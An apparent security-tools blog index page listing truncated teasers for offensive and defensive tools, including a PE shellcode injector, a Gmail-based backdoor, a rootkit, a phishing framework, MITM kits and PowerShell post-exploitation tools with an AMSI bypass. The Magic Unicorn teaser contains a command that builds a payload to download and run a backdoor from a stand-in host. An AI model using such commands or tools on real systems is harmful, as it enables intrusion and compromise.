Clik here to view.
Droidfuzzer – A Modular Android Fuzzing Toolkit.
DroidFuzzer is a Android fuzzing toolkit that is mean to target devices and their mechanisms for parsing things like images and documents. DroidFuzzer is meant to be modular allowing the support for...
View ArticleClik here to view.
cypher is a Simple tool to automate adding shellcode to PE files.
cypher is a Simple tool to automate adding shellcode to PE files. With payload options: 0 – windows/shell_reverse_tcp 1 – windows/meterpreter/reverse_http 2 – windows/meterpreter/reverse_http...
View ArticleClik here to view.
ReVdK3 Acces Point pentest Script.
This Script was created for Access Points that locks up for long periods of time. It works by starting reaver and continously detect when reaver is rate limiting pins, once reaver detects the AP is...
View ArticleClik here to view.
SQLViking is a sniff/log database traffic or actively execute arbitrary...
SQLViking is a sniff/log database traffic or actively execute arbitrary queries via TCP injection. Tool is broken up into two pieces: 1. Scout: passively reads and logs SQL queries and their responses...
View ArticleClik here to view.
Eros Rootkit is a special kind of malware with it’s own custom bootloader.
NOTICE: THIS POST JUST FOR EDUCATION PURPOSE ONLY! YOU CAN LEARN HOW TO rootkit takes control of the system. The Eros Rootkit is a special kind of malware with it’s own custom bootloader. The rootkit...
View ArticleClik here to view.
O-Saft v16.05.15: OWASP SSL audit for testers & OWASP SSL advanced forensic...
changelog version 16.05.15: + updated version, deleted unused value for cfg{‘openssl_version_map’} + First use of error_handler, editorial changes + Net::SSLeay as exception for global vars added +...
View ArticleClik here to view.
King Phisher v1.3.0 – a phishing-focused social engineering campaign.
Changelog v1.3.0 Released on May 17th, 2016: + Added automatic setup of PostgreSQL database for the server + Server bug fixes when running on non-standard HTTP ports + Added completion to the messaged...
View ArticleClik here to view.
PowerOPS – Powershell for Offensive Operations.
PowerOPS is an application written in C# that does not rely on powershell.exe but runs PowerShell commands and functions within a powershell runspace environment (.NET). It intends to include multiple...
View ArticleClik here to view.
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer.
Radamsa is a test case generator for robustness testing, a.k.a. a fuzzer. It is typically used to test how well a program can withstand malformed and potentially malicious inputs. It works by reading...
View ArticleClik here to view.
Pocsuite v2 ~ A remote vulnerability test framework.
Roadmap changelog version 2.1 ————————————- * add method:resolve_js_redirects * differentiate between error and failure version 2.0 ————— * Integrate Seebug and ZoomEye APIs(doing) * Add English...
View ArticleClik here to view.
QuantumInject – Packet injection and detection using python.
quantumInject it will capture the traffic from a network interface in promiscuous mode, and attempt to inject spoofed responses to selected client requests towards TCP services. quantuminject Your...
View ArticleClik here to view.
NoSQLMap v0.5.1.1 – Automated Mongo database and NoSQL web application...
Latest change v0.5.1.1: + Update nsmcouch.py + idea/NoSQLMap-v0.5.iml & nosqlmap.py; fix two bug of set local mongoDB/shell IP: – bug1: Every time when user input Invalid IP, goodLen and goodDigits...
View ArticleClik here to view.
sshhipot : High-interaction MitM SSH honeypot.
sshhipot : High-interaction MitM SSH honeypot. The general idea is that sshlowpot runs somewhere between the attacker and the real SSH server such that the attacker logs into the honeypot, and the...
View ArticleClik here to view.
gdog v1.1 – A fully featured backdoor that uses Gmail as a C&C server.
changelog gdog v1.1: + Bug fixing (shellcode) + fixed by carnal0wnage. + Shellcode generator helper + Minor improvements gdog v1.1 Gdog is A stealthy Python based backdoor that uses Gmail as a command...
View ArticleClik here to view.
Nishang v0.6.7 – PowerShell for penetration testing and offensive security.
changelog v0.6.7: – Added Out-JS.ps1 in the Client directory. – Added Out-SCT.ps1 in the Client directory. – Added Invoke-JSRatRegsvr.ps1 in the Shells directory. – Added Out-RundllCommand in the...
View ArticleClik here to view.
Appmon – Runtime Security Testing Framework for iOS, Mac OS X and Android Apps.
AppMon is an automated framework for monitoring and tampering system API calls of native apps on iOS, Mac OS X and Android apps (upcoming). You may call it the GreaseMonkey for native mobile apps....
View ArticleClik here to view.
BetterCap v1.5.5 – A complete, modular, portable and easily extensible MITM...
Changelog v1.5.5: New Features + New –use-mac and –random-mac options to hide the interface MAC address during an attack. + HTTP proxy modules can now return a crafted response from their...
View ArticleClik here to view.
p0wnedShell v1.4 – PowerShell Runspace Post Exploitation Toolkit.
Changelog Version 1.4: + Includes a bypass method for Amsi (Antimalware Scan Interface) within Windows 10. pownedshell v1.4 p0wnedShell is an offensive PowerShell host application written in C# that...
View ArticleClik here to view.
Magic Unicorn Attack Vector v2.3.
Changelog version 2.3: * added support for windows/download_exec as a payload option – just run python unicorn.py windows/download_exec exe=exename.exe url=http://badsite.com/backdoor.exe – note it...
View ArticleClik here to view.
MacroShop – Collection of scripts to aid in delivering payloads via Office...
Collection of scripts to aid in delivering payloads via Office Macros. Most are python. 1. macro_safe.py Generates safe for VB inclusion into an excel spreadsheet. Requires a batch file generated by...
View Article